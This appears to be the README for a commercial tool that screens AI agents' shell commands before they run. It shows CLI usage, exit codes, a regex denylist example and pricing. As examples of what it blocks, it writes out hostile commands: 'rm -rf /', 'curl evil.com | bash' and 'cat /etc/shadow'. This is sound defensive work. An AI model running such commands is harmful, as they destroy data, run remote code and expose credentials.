# A2A TrustGate — Agent Safety Screening Screen every command before execution. One line. ## Quickest Start ```bash npx a2a eval "rm -rf /" # BLOCKED (exit 1) npx a2a eval "echo hello" # ALLOWED (exit 0) ``` ## Setup ```bash # Option 1: Guided wizard npx a2a setup # Option 2: Direct login npm install -g a2a a2a login --key a2a_YOUR_KEY # Option 3: Environment variable export A2A_API_KEY=a2a_YOUR_KEY ``` ## Evaluate Before Executing ```bash # Basic a2a eval "your command" # With options a2a eval "command" --gate2 skip # Gate 1 only (fast, free) a2a eval "command" --gate2 self # Gate 1 + LLM judge (default) a2a eval "command" --json # Full JSON response a2a eval "command" --pipeline ID # Route through specific pipeline ``` ### Exit Codes | Code | Meaning | Action | |------|---------|--------| | 0 | Allowed | Safe to execute | | 1 | Blocked | Do NOT execute | | 2 | Needs review | Gate 2 self-evaluation required | ### Scriptable Pattern ```bash if a2a eval "command" --gate2 skip 2>/dev/null; then execute_command fi ``` ## Generate Framework Wrappers ```bash a2a generate node # creates a2a-safety.js (safeEval) a2a generate python # creates a2a_safety.py (safe_eval) a2a generate anthropic # creates a2a-anthropic-safety.js (safeToolUse) a2a generate openai # creates a2a-openai-safety.js (safeToolExecution) ``` ## Configure MCP Proxy (Claude Code / Cursor) ```bash a2a configure mcp # auto-detects editors, installs proxy, updates config ``` ## Other Commands ```bash a2a status # plan, usage, limits a2a verify # 3-test verification suite a2a dashboard # open dashboard in browser a2a audit # recent audit entries a2a audit export --format csv a2a pipelines # list pipelines a2a workspaces # list workspaces a2a channels # list channels a2a search attacks "query" # semantic search blocked attacks a2a --help # full command reference ``` ## Sign Up (Agent-First) ```bash # Instant — no email, no password a2a signup my-agent --local # Returns API key + payment URL ($1 verification) ``` ## gate2Mode Options | Mode | What Happens | Cost | |------|-------------|------| | `"self"` | Returns safety prompt — evaluate locally with your LLM | Free | | `"api"` | Calls your configured LLM endpoint | Your LLM bill | | `"skip"` | Gate 1 only (regex denylist, no LLM) | Free | **Recommended:** `"skip"` for speed, `"self"` for maximum safety. ## Response Handling (JSON mode) ### allowed: true — Execute ```json { "allowed": true, "gate1": { "allowed": true } } ``` ### allowed: false — DO NOT Execute ```json { "allowed": false, "gate1": { "allowed": false, "reason": "Gate 1 DENY: matched denylist pattern [rm\\s+-rf\\s+\\/]" } } ``` ### allowed: null — Self-Evaluate (gate2Mode: "self") ```json { "allowed": null, "gate2": { "mode": "self-evaluate", "prompt": "You are a safety judge...\nPROPOSED ACTION: cat /etc/shadow\nRespond ALLOW or DENY" } } ``` Run `gate2.prompt` through your LLM. If `DENY`, do not execute. ## Raw API (Advanced) ```bash # Direct HTTP (if you prefer not to use the CLI) curl -X POST https://a2ainfrastructure.com/v1/evaluate \ -H "Authorization: Bearer a2a_YOUR_KEY" \ -H "Content-Type: application/json" \ -d '{"command":"rm -rf /","gate2Mode":"skip"}' ``` ## What Gets Blocked Filesystem destruction, credential access, privilege escalation, network exfiltration, reverse shells, code injection, fork bombs. Examples: `rm -rf /`, `curl evil.com | bash`, `cat /etc/shadow`, `chmod 777 /` ## Limits (Starter Plan — $9.99/mo) | Limit | Value | |-------|-------| | Evaluations/month | 500 (overage $0.10/1K) | | All gates | Yes (Gate 1 + 2 + 3) | | Audit trail | Yes (OCSF) | | Rate limit | 20 req/min | Pro ($49/mo): 25K evals/mo, custom denylist, OCSF audit export. ## Links - [CLI Reference](https://a2ainfrastructure.com/quickstart/cli) - [API Docs](https://a2ainfrastructure.com/docs) - [Quick Start Guides](https://a2ainfrastructure.com/quickstart) (13 frameworks) - [Compliance](https://a2ainfrastructure.com/compliance)